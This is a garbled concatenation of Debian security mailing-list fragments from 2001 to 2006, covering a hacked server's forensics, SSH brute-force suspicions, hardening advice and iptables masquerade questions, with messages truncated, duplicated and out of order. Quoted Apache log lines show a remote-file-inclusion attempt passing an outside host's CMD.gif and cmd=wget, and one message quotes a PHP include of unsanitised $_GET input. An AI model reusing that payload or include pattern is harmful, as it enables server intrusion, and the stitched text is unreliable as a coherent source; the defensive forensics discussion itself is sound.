On Mon, Nov 06, 2006 at 11:19:20AM +0100, Heilig Szabolcs wrote:
> Hello!
>
> >http://jesusch.de/~jesusch/tmp/access.log
>
> There are many log entries with "something=http://"; style
> pattern. These are common attack methods against default configured
> servers with poorly written applications.
On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
> http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
> HTTP/1.0" 403 495
> "http://85.214.18.193
Hi Fuzzums,
Fuzzums wrote:
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/conne
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.p
Hi,
> at that mentioned time someone at least tried to access pages which are
> not accessable (index.php?img=1 e.g.)
>
> ther definately might be a problem in the code:
>
> if ( $_GET['page'] ) {
> include $_GET['page'].'/index.php';
> }
>
>
> could this be the vulnerable code segment?
Hello!
http://jesusch.de/~jesusch/tmp/access.log
There are many log entries with "something=http://"; style
pattern. These are common attack methods against default configured
servers with poorly written applications. Many of these rely on
register_globals=on php.ini setting. Turn it off first
I've put access.log online with the following cut off:
grep -v "Googlebot/2.1" access.log.1| grep -v ^87.106.31.224|grep -v
gallery|grep -v "Yahoo! Slurp"|grep -vi svn |grep -v mediawiki |grep -v
"favicon.ico"
http://jesusch.de/~jesusch/tmp/access.log
at that mentioned time someone at l
As I'm not so aware could someone be so kind to help me with a forensic
analysis? I also still do not know which program (probably any php-stuff)
was/is vulnerable.
All I've found so far were these entries in my apache2 error-log.
http://jesusch
Hi list,
My sarge box was recently hacked by some script kiddy who installed
an irc-dcc-fileserver on it :/
As I'm not so aware could someone be so kind to help me with a forensic
analysis? I also still do not know which program (probably any
php-stuff) was/is vulnerable.
All I've found so
--- Original message ---
From: Paolo Pedaletti [mailto:[EMAIL PROTECTED]
Sent: Friday, 22 July 2005 11:32
To: debian-security@lists.debian.org
Subject: Re: Help needed - server hacked twice in three days (and I don't
think I'm a newbie)
ciao Thomas Sjögren,
> . Better pas
Karsten Dambekalns wrote:
Jul 19 03:07:30 ds217-115-141-24 sshd[27011]: Illegal user anton from
217.115.205.101
# whois 217.115.205.101
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools
ciao Thomas Sjögren,
> . Better passwords
like using libpam-cracklib and dcredit,ucredit,lcredit,ocredit options
and...
- send syslog (better syslog-ng) entries to a log-server
- chroot LAMP
- run nessus against the server
- run snort on server
- ... (what else?)
If he had enough time, he
I don't know what type of php applications you are using with apache, but
with php I would recommend to use something like 'modsecurity' for apache,
configuring modsecurity to your needs and have apache chrooted. For
iptables, something like firehol can help you to set up iptables quickly.
--
-J
In gmane.linux.debian.devel.security, you wrote:
> Now, I find it unlikely to see the same local root exploit in 2.4.18 and
> 2.6.7. How did he gain root access?
Are you sure it's 2.6.7 and not 2.6.8, the Sarge kernel?
Anyway, there are several unfixed local privilege escalation security
issues i
Hi.
On Friday 22 July 2005 00:00, Rob Sims wrote:
> On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> > way? What is currently possible in that respect on a machine that runs
> > ssh, apache, php, exim and nothing else (all as of Debian 3.1)?
>
> Didn't one of your logs show ov
Hi.
On Friday 22 July 2005 00:14, Ulf Harnhammar wrote:
> On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> > way? What is currently possible in that respect on a machine that runs
> > ssh, apache,
> ^^
> >
Goswin von Brederlow <[EMAIL PROTECTED]> writes:
> Karsten Dambekalns <[EMAIL PROTECTED]> writes:
>
>> Hi.
>>
>> On Thursday 21 July 2005 20:31, Andras Got wrote:
>>> The users, the ones the machines was hacked, were they existing users on
>>> the machine?
>>
>> I don't know which user account got
Hi.
On Thursday 21 July 2005 22:52, Goswin von Brederlow wrote:
> > I don't know which user account got hacked, if this was what has
> > happened.
>
> Did you check the last lock? Maybe the attacker didn't remove the
> traces there.
He ran the mentioned logclean binary, the content of wtmp is not
On Thu, Jul 21, 2005 at 11:49:53PM +0200, Karsten Dambekalns wrote:
> Another question came up here. Is it really likely to be a SSH brute force
> break in, or could the attacker have been able to log in some other way? What
> is currently possible in that respect on a machine that runs ssh, apac
Hi.
On Thursday 21 July 2005 22:39, Andras Got wrote:
> It's important to know whether it's an existing account, imho.
Yes. It is, because if it's not, it's not about cracking passwords, but
something else. Ugh.
> >>Do you use AllowUsers or AllowGroup?
> >
> > No. I hate to admit I didn't know
Hi.
Thanks for your reply!
Another question came up here. Is it really likely to be a SSH brute force
break in, or could the attacker have been able to log in some other way? What
is currently possible in that respect on a machine that runs ssh, apache,
php, exim and nothing else (all as of De
Karsten Dambekalns <[EMAIL PROTECTED]> writes:
> Hi.
>
> On Thursday 21 July 2005 20:31, Andras Got wrote:
>> The users, the ones the machines was hacked, were they existing users on
>> the machine?
>
> I don't know which user account got hacked, if this was what has happened.
Did you check the l
On Thu, Jul 21, 2005 at 08:17:38PM +0200, Karsten Dambekalns wrote:
> Now, I find it unlikely to see the same local root exploit in 2.4.18 and
> 2.6.7.
They are both old kernels, compile your own and apply suitable patches.
Grsecurity is one, and it doesn't need any particular configuration.
>
Hi,
Karsten Dambekalns wrote:
Hi.
On Thursday 21 July 2005 20:31, Andras Got wrote:
The users, the ones the machines was hacked, were they existing users on
the machine?
I don't know which user account got hacked, if this was what has happened.
It's important to know whether it's an exis
Hi.
On Thursday 21 July 2005 20:31, Andras Got wrote:
> The users, the ones the machines was hacked, were they existing users on
> the machine?
I don't know which user account got hacked, if this was what has happened.
> Do you use AllowUsers or AllowGroup?
No. I hate to admit I didn't know tha
Hi.
A server I take care of has been hacked twice in the last three days. It is
running Debian GNU/Linux, obviously. I ask you for advice on how this
happened, what happened, and what to do to avoid this.
The first hack happened on Tuesday, the machine was running Debian 3.0 plus
patches *but*
Hello people,
I am having problems with connecting my RedHat Linux box to the internet. I cannot seem to be able to even ping any other machine on the network. I do
> telnet localhost. I get
>localhost: Host name lookup failure.
I tried >telnet 127.0.0.1.
It waits for some time and then says:
t
On Mon, Feb 09, 2004 at 08:21:15PM -0800, Jeff wrote:
> suhail, 2004-Feb-09 15:15 -0800:
[snip]
> > Now how do i actually find out if the packets are being dropped.
> > i.e where shud I chk my system log files to see the dropped packets
> > ... I mean which file is it n under which dir ..
>
> The
suhail, 2004-Feb-09 15:15 -0800:
> Hello,
> I need to know how can a firewall be tested against a SYN Flooder. I
> have the SYN flooder program and also configured my firewall. My
> IPtables script against the SYN packets is the usual :
>
> > $IPTABLES -N syn-flood
> > $IPTABLES -A syn-flood -m li
Hello,
I need to know how can a firewall be tested against a SYN Flooder. I have the SYN flooder program and also configured my firewall. My IPtables script against the SYN packets is the usual :
> $IPTABLES -N syn-flood
> $IPTABLES -A syn-flood -m limit --limit 50/s --limit-burst 104 -j RETURN
> $I
11 Jul, 2001, Luc MAIGNAN wrote in " Help needed on snort "]
> Hi,
>
> I use (I would to ...) snort v1.7, but I don't succeed to use the scripts
> given on the web site. Has anyone an example to let me understand what to do ?
>
> Best regards
>
>
> --
Hi,
I use (I would to ...) snort v1.7, but I don't succeed to use the scripts
given on the web site. Has anyone an example to let me understand what to do ?
Best regards
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> HI all,
>
> I have an internet connection on eth0 (10.0.0.1) and a private network
> connection on eth1 (192.168.0.1).
>
> I put the masquerade configuration on a kernel 2.4.4 :
>
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> HI all,
>
> I have an internet connection on eth0 (10.0.0.1) and a private network
> connection on eth1 (192.168.0.1).
>
> I put the masquerade configuration on a kernel 2.4.4 :
>
> iptables -t nat -s 192.168.0.0/24 -o ppp0
you need to set it to eth0 not ppp0
- Original Message -
From: Luc MAIGNAN <[EMAIL PROTECTED]>
To:
Cc: ; <[EMAIL PROTECTED]@lists.debian.org>
Sent: Monday, June 04, 2001 7:39 AM
Subject: Help needed on MASQUERADE
> HI all,
>
> I have an internet connection on
you need to set it to eth0 not ppp0
- Original Message -
From: Luc MAIGNAN <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: ; <[EMAIL PROTECTED]@lists.debian.org>
Sent: Monday, June 04, 2001 7:39 AM
Subject: Help needed on MASQUERADE
> HI all,
>
> I have an
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
> echo 1>/proc/sys/net/ipv4/ip_forward
This wouldn't work at all. You have to write
iptables -t nat -I POSTROUTING -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
--
[EMAIL PROTECTED]
ROBERT MAG
you need to send it through eth0 not ppp0
[EMAIL PROTECTED] wrote:
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
echo 1>/proc/sys/net/ipv4/ip_forward
A workstation on my network succeeded to ping both eth0
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
> echo 1>/proc/sys/net/ipv4/ip_forward
> A workstation on my network succeeded to ping both eth0 and eth1, but didn't
> succeed to go out of my network to reach the i
HI all,
I have an internet connection on eth0 (10.0.0.1) and a private network
connection on eth1 (192.168.0.1).
I put the masquerade configuration on a kernel 2.4.4 :
iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
echo 1>/proc/sys/net/ipv4/ip_forward
A workstation on
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
> echo 1>/proc/sys/net/ipv4/ip_forward
This wouldn't work at all. You have to write
iptables -t nat -I POSTROUTING -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
--
[EMAIL PROTECTED]
ROBERT MA
you need to send it through eth0 not ppp0
[EMAIL PROTECTED] wrote:
>On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
>
>> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
>> echo 1>/proc/sys/net/ipv4/ip_forward
>>
>>A workstation on my network succeeded to ping both
On Sun, Jun 03, 2001 at 11:39:29PM +0200, Luc MAIGNAN wrote:
> iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
> echo 1>/proc/sys/net/ipv4/ip_forward
> A workstation on my network succeeded to ping both eth0 and eth1, but didn't
> succeed to go out of my network to reach the
HI all,
I have an internet connection on eth0 (10.0.0.1) and a private network
connection on eth1 (192.168.0.1).
I put the masquerade configuration on a kernel 2.4.4 :
iptables -t nat -s 192.168.0.0/24 -o ppp0 -j MASQUERADE
echo 1>/proc/sys/net/ipv4/ip_forward
A workstation o